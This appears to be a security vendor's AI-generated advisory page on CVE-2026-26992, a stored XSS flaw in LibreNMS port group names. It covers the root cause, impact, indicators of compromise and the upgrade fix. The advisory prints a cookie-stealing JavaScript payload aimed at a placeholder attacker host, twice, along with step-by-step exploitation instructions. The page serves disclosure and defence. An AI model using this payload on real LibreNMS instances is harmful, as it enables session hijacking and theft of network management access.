CVE-2026-26992: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-26992 is a stored Cross-Site Scripting (XSS) vulnerability in LibreNMS affecting the /port-groups endpoint's name parameter. An authenticated attacker with admin privileges can inject unsanitized JavaScript into a port group name via HTTP POST, which is then persistently stored and executed in the browsers of other users who view the port group list. All LibreNMS versions prior to 26.2.0 are affected. The vulnerability was published on February 17, 2026, and carries a CVSS v3.1 score of 4.8 (Medium) and a CVSS v4.0 score of 5.1 (Medium) (GitHub Advisory, LibreNMS Advisory).

Technical details

The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically the failure to sanitize HTML/JavaScript characters in the port group name field before storing and rendering it. The vulnerable template resources/views/port-group/index.blade.php directly interpolates the unsanitized port group name into the delete_pg() JavaScript function call rendered on the page, allowing injected script to execute when the Delete button is rendered for any user viewing the port group list. Exploitation requires the attacker to be authenticated with admin privileges and a victim user to view the port groups page. A public proof-of-concept payload is documented in the official advisory: 12345');var pt=new Image();pt.src='http://<attacker>/cookiePG'.concat(document.cookie);document.body.appendChild(pt);delete_pg(this, '12345 (LibreNMS Advisory, GitHub Advisory).

Impact

Successful exploitation allows the attacker to steal session cookies from other LibreNMS users (including non-admin users), perform unauthorized actions on their behalf, redirect victims to malicious sites, or capture other sensitive information displayed in the browser session. Since LibreNMS is a network monitoring platform with visibility into infrastructure topology and device credentials, session hijacking could expose sensitive network management data. Availability is not directly impacted, but confidentiality and integrity of the affected system and subsequent systems are both rated as low impact (LibreNMS Advisory, GitHub Advisory).

Exploitability

A proof-of-concept exploit is publicly documented in the official GitHub Security Advisory, demonstrating cookie exfiltration via a crafted port group name. There is no evidence of active in-the-wild exploitation at this time, and no threat actor attribution has been reported. The EPSS score is approximately 0.007% (0th percentile), indicating a very low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (GitHub Advisory, LibreNMS Advisory).

Exploitation steps

  1. Authenticate as admin: Log in to the LibreNMS instance using an account with admin privileges.
  2. Navigate to Port Groups: Go to Ports > Manage Port Groups and select "New Port Group".
  3. Inject XSS payload: In the "Name" input field, enter a crafted payload such as: 12345');var pt=new Image();pt.src='http://<attacker-ip>/cookiePG'.concat(document.cookie);document.body.appendChild(pt);delete_pg(this, '12345 (replacing <attacker-ip> with an attacker-controlled server).
  4. Save the port group: Click Save. The malicious name is stored in the database without sanitization.
  5. Trigger execution: When any LibreNMS user (including non-admin) navigates to the Port Groups page and the Delete button for the malicious entry is rendered, the injected JavaScript executes in their browser context.
  6. Collect stolen cookies: The victim's session cookie is sent as an HTTP GET request to the attacker's server, enabling session hijacking and unauthorized access (LibreNMS Advisory).

Indicators of compromise

  • Network: Outbound HTTP requests from LibreNMS users' browsers to unexpected external IP addresses or domains, particularly with URL parameters containing cookie data (e.g., GET /cookiePG<session_cookie_value>).
  • Logs: LibreNMS web access logs showing HTTP POST requests to /port-groups with unusually long or script-containing name parameter values; subsequent GET requests to the port groups page from multiple user accounts.
  • Application: Port group entries in the LibreNMS database with names containing JavaScript syntax such as ');, var , document.cookie, new Image(), or <script> tags.
  • Browser/Proxy: Proxy or WAF logs capturing requests with encoded JavaScript payloads in the name field of POST requests to /port-groups (LibreNMS Advisory).

Mitigation and workarounds

Upgrade LibreNMS to version 26.2.0 or later, which addresses this vulnerability by moving the port group name out of the inline JavaScript call and into a data-group-name HTML attribute, preventing script injection (commit 882fe6f). As a temporary workaround, restrict admin account access to trusted users only and monitor port group creation activity. Deploying a Web Application Firewall (WAF) with rules to filter JavaScript patterns in user inputs can provide additional defense-in-depth (GitHub Advisory, LibreNMS Release).

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management